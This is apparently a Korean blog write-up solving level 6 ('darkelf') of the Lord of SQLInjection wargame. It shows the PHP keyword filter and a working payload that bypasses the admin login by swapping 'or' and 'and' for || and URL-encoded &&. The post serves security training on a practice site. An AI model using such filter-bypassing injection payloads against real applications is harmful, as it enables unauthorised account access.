반응형
Lord of SQLInjection
los.rubiya.kr
Lord of SQLInjection 6번 darkelf
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
or 와 and가 필터링이 되었다.
or 우회기법 ==> ||
and 우회기법 ==> %26%26
?pw=%27%20||%20%271%27=%271%27%20%26%26%20id=%27admin%27%23
pw='' or '1'='1' and id='admin'
저번 문제와 똑같은 방식을 썼지만 여기서 or와 and만 바꾸면 된다.
pw='' || '1'='1' && id='admin'#'
반응형
'#WarGame > Lord of SQLInjection' 카테고리의 다른 글
| Lord of SQLInjection 8번 troll (0) | 2021.08.07 |
|---|---|
| Lord of SQLInjection 7번 orge (0) | 2021.08.07 |
| Lord of SQLInjection 5번 wolfman (0) | 2021.08.06 |
| Lord of SQLInjection 4번 orc (0) | 2021.08.06 |
| Lord of SQLInjection 3번 goblin (0) | 2021.08.06 |
